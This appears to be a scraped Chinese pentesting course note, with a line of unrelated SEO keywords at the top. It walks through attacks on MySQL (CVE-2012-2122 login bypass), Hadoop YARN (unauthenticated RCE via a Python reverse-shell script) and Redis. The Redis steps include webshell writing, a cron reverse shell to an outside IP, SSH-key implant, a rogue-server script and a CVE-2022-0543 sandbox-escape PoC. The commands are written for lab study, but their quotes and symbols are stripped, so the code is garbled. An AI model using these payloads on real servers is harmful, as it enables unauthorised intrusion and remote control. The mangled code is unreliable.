适合做网站的图片,做销售在哪些网站发贴,怎么做网站推广线下,西安微信商城网站开发第54天 服务攻防-数据库安全RedisHadoopMysqla未授权访问RCE
知识点#xff1a;
1、服务攻防数据库类型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不当未授权三重奏RCE漏洞 3、Redis-配置不当未授权…第54天 服务攻防-数据库安全RedisHadoopMysqla未授权访问RCE
知识点
1、服务攻防数据库类型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不当未授权三重奏RCE漏洞 3、Redis-配置不当未授权三重奏RCE两漏洞
#章节内容 常见服务应用的安全测试 1、配置不当-未授权访问 2、安全机制特定安全漏洞 3、安全机制弱口令爆破攻击
#前置知识 应用服务安全测试流程见图 组合猜测由于nat会导致端口扫描不到真实端口信息、信息来源报错、特征 1、判断服务开放情况-端口扫描组合应用等 2、判断服务类型归属数据库文件传翰通讯等 3、判断服务利用方式特定漏洞未授权弱口令等
演示案例
Mysq-未授权访问-CVE-2012-2122利用 Hadoop-.未授权访问-内置配合命令执行RCE Redis-未授权访问-Webshelle任务密匙RCE等
Mysq-未授权访问-CVE-2012-2122利用 复现环境vulhub
for i in seq 1 1000; do mysql -uroot -pwrong -h you-ip -P3306 ; done 漏洞复现
1、vulhub开启漏洞环境 2、攻击机kali扫描目标端口并验证
Hadoop-未授权访问-内置配合命令执行RCE 复现环境vulfocus 思路访问特定
#!/usr/bin/env pythonimport requeststarget http://127.0.0.1:8088/
lhost 192.168.0.1 # put your local host ip here, and listen at port 9999url target ws/v1/cluster/apps/new-application
resp requests.post(url)
app_id resp.json()[application-id]
url target ws/v1/cluster/apps
data {application-id: app_id,application-name: get-shell,am-container-spec: {commands: {command: /bin/bash -i /dev/tcp/%s/9999 01 % lhost,},},application-type: YARN,
}
requests.post(url, jsondata)漏洞复现 1、vulhub搭建hadoop漏洞环境 2、攻击机kali开启nc监听端口使用exp攻击反弹shell #Redis-未授权访问-Webshell任务密匙RCE等 1、写Webshell需得到Web路径 利用条件Web目录权限可读写 config set dir /tmp #设置WEB写入目录 config set dbfilename1.php设置写入文件名 set testc?php phpinfo):?#设置写入文件代码 bgsave #保存执行 save #保存执行 注意部分没目录权限读写权限
2、写定时任务反单shell 利用条件 允许异地登录 安全模式protected-mode处于关闭状态 config set dir /var/spool/cron set yy “ninin*****bash-/dev/tcp/47.94.236.117/555501nnn” config set dbfilename x save 注意 centos会忽略乱码去执行格式正确的任务计划 而ubuntu并不会忽略这些乱L码所以导致命令执行失败
3、写入Linux ssh-key公钥 利用条件 允许异地登录 Redis服务使用ROOT账号启动 安全模式protected-mode处于关闭状态 允许使用密钥登录即可远程写入一个公钥直接登录远程服务器 ssh-keygen-t rsa cd /root/.ssh/ (echo -e “nin”;cat id_rsa.pub;echo-enin)key.txt cat key.txt redis-cli-h 118.31.57.214 -x set xxx config set dir /root/.ssh/ config set dbfilename authorized keys save cd /root/.ssh/ ssh -i id rsa root118.31.57.214
4、RCE自动化利用脚本-vulfocus https://github.com/vulhub/redis-rogue-getshell python redis-.master…py-f123.58.236.76-p9830-L47.94.236.117-P8888-f RedisModulesSDK/exp.so -c “id”
5.新漏洞-沙箱绕过RCE CVE-2022-0543-vulfocus Poc:执行id命令 eval local io_I package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”,“luaopen_io”); local io io_I;local fio.popen(“id”,“r”);local res f.read(“a”);f:close;return res’o 参考链接https://blog.csdn.net/qq_40882763/article/details/129742604?spm1001.2101.3001.6650.2utm_mediumdistribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1depth_1-utm_sourcedistribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1utm_relevant_index5 老哥写的很详细后期我也会逐个复现